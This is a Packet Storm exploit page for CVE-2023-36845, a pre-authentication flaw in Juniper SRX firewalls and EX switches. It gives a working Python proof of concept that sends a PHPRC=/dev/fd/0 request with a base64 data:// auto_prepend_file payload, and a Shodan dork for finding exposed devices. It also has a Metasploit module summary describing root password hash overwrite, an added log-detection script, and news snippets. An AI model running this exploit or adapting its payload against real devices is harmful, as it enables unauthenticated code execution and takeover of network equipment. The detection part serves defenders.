
Juniper SRX Firewall / EX Switch Remote Code Execution

This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845. It executes the phpinfo() function on the login page of the target device, which exposes the device's PHP configuration for inspection. The script can also save the phpinfo() output to a file for further analysis.

Packet Storm
# ***************************************************************************************************
# Exploit Title: juniper-SRX-Firewalls&EX-switches (PreAuth-RCE) (PoC)
# Description:
#
# This code serves as both a vulnerability detector and a proof of concept for CVE-2023-36845.
# It executes the phpinfo() function on the login page of the target device,
# allowing to inspect the PHP configuration. also this script has the option to save the phpinfo()
# output to a file for further analysis.
#
# Shodan Dork: http.favicon.hash:2141724739
# Date: 2023/10/01
# Exploit Author: whiteOwl ([email protected])
# Vendor Homepage: https://whiteowl-pub.github.io
# Version: Versions Prior to 20.4R3-S9,21.1R1,21.2R3-S7,21.3R3-S5,
#          21.4R3-S5,22.1R3-S4,22.2R3-S2,22.3R2-S2/R3-S1,
#          22.4R2-S1/R3,23.2R1-S1/R2
# Tested on: JUNOS SM804122pri 15.1X49-D170.4
# CVE : cve-2023-36845
# ***************************************************************************************************
import argparse
import requests

banner = """
*************************************************************
* CVE-2023-36845 Vulnerability Detector & Proof of concept  *
* This script checks for the CVE-2023-36845 vulnerability   *
* and run phpinfo() on vulnerable devices.                  *
* If you suspect a vulnerable system, please take action    *
* immediately to secure it.                                 *
*                                                           *
* Author: whiteowl                                          *
*************************************************************
"""

def send_request(url, output_file=None, verbose=False):
    target_url = f"{url}/?PHPRC=/dev/fd/0"
    data = 'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
    headers = {
        'User-Agent': 'Mozilla/5.0',
    }
    try:
        response = requests.post(target_url, headers=headers, data=data, stream=True)
        if response.status_code == 200:
            print("The Target Device is Vulnerable to: CVE-2023-36845")
        else:
            print("Not Vulnerable: Status Code", response.status_code)

        if output_file:
            with open(output_file, 'w', encoding='utf-8') as file:
                file.write(response.text)
        if verbose:
            print(f"HTTP Status Code: {response.status_code}")
            print("Response Headers:")
            for header, value in response.headers.items():
                print(f"{header}: {value}")
            print("Response Content:")
            print(response.text)
    except requests.exceptions.RequestException as e:
        print(f"An error occurred: {e}")

def main():
    print(banner)
    parser = argparse.ArgumentParser(description="Custom curl-like script")
    parser.add_argument("-u", "--url", required=True, help="URL to send the HTTP request")
    parser.add_argument("-o", "--output", help="Output file to save the HTML content")
    parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose mode")
    args = parser.parse_args()
    send_request(args.url, args.output, args.verbose)

if __name__ == "__main__":
    main()
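
For defenders, the request shape used by the script above (a PHPRC query parameter, plus a body that sets PHP ini directives) can be hunted for in web logs. The following is an added detection example, not part of the original PoC or of Packet Storm's entry; the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in combined log format (documentation-range addresses).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Oct/2023:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Oct/2023:10:00:05 +0000] "POST /?PHPRC=/dev/fd/0 HTTP/1.1" 200 80211 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Oct/2023:10:00:09 +0000] "POST /?%50HPRC=%2Fdev%2Ffd%2F0 HTTP/1.1" 200 431 "-" "curl/8.0"
203.0.113.4 - - [01/Oct/2023:10:01:00 +0000] "GET /search?q=what+is+PHPRC HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# The two ini directives the page's request body sets.
INI_RE = re.compile(r'^\s*(auto_prepend_file|allow_url_include)\s*=', re.I | re.M)


def find_phprc_requests(log_text):
    """Return logged requests whose query string sets a PHPRC parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qsl percent-decodes names and values, so an encoded name
        # such as %50HPRC is normalised before comparison.
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.strip().upper() == "PHPRC":
                hits.append({"client": m["client"], "method": m["method"],
                             "target": m["target"], "status": int(m["status"]),
                             "phprc": value})
    return hits


def ini_directives_in_body(body):
    """Return which of the two ini directives a captured request body tries to set."""
    return {d.lower() for d in INI_RE.findall(body)}


if __name__ == "__main__":
    for hit in find_phprc_requests(SAMPLE_LOG):
        print(hit)
```

Access logs rarely record request bodies, so `ini_directives_in_body` only applies where a proxy or WAF captures them; the query-string check works on ordinary logs.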

Related news

CISA Sets a Deadline - Patch Juniper Junos OS Flaws Before November 17

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has given a November 17, 2023, deadline for federal agencies and organizations to apply mitigations to secure against a number of security flaws in Juniper Junos OS that came to light in August. The agency on Monday added five vulnerabilities to the Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active

Juniper SRX Firewall / EX Switch Remote Code Execution

This Metasploit module exploits a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. The affected Juniper devices run FreeBSD, and every FreeBSD process can access its stdin by opening /dev/fd/0. The exploit also makes use of two useful PHP features. The first is auto_prepend_file, which causes the provided file to be added using the require function. The second is allow_url_include, which allows the use of URL-aware fopen wrappers. By enabling allow_url_include, the exploit can use any protocol wrapper with auto_prepend_file. The module then uses data:// to provide a file inline which includes the base64 encoded PHP payload. By default this exploit returns a session confined to a FreeBSD jail with limited functionality. There is a datastore option JAIL_BREAK, that when set to true, will steal the necessary tokens from a user authenticated to the J-Web application, in order to overwrite the root password hash. If ther...

Over 12,000 Juniper Firewalls Found Vulnerable to Recently Disclosed RCE Vulnerability

New research has found that close to 12,000 internet-exposed Juniper firewall devices are vulnerable to a recently disclosed remote code execution flaw. VulnCheck, which discovered a new exploit for CVE-2023-36845, said it could be exploited by an "unauthenticated and remote attacker to execute arbitrary code on Juniper firewalls without creating a file on the system." CVE-2023-36845 refers to a

Alert: Juniper Firewalls, Openfire, and Apache RocketMQ Under Attack from New Exploits

Recently disclosed security flaws impacting Juniper firewalls, Openfire, and Apache RocketMQ servers have come under active exploitation in the wild, according to multiple reports. The Shadowserver Foundation said that it's "seeing exploitation attempts from multiple IPs for Juniper J-Web CVE-2023-36844 (& friends) targeting /webauth_operation.php endpoint," the same day a proof-of-concept (PoC)

New Juniper Junos OS Flaws Expose Devices to Remote Attacks - Patch Now

Networking hardware company Juniper Networks has released an "out-of-cycle" security update to address multiple flaws in the J-Web component of Junos OS that could be combined to achieve remote code execution on susceptible installations. The four vulnerabilities have a cumulative CVSS rating of 9.8, making them Critical in severity. They affect all versions of Junos OS on SRX and EX Series. "By
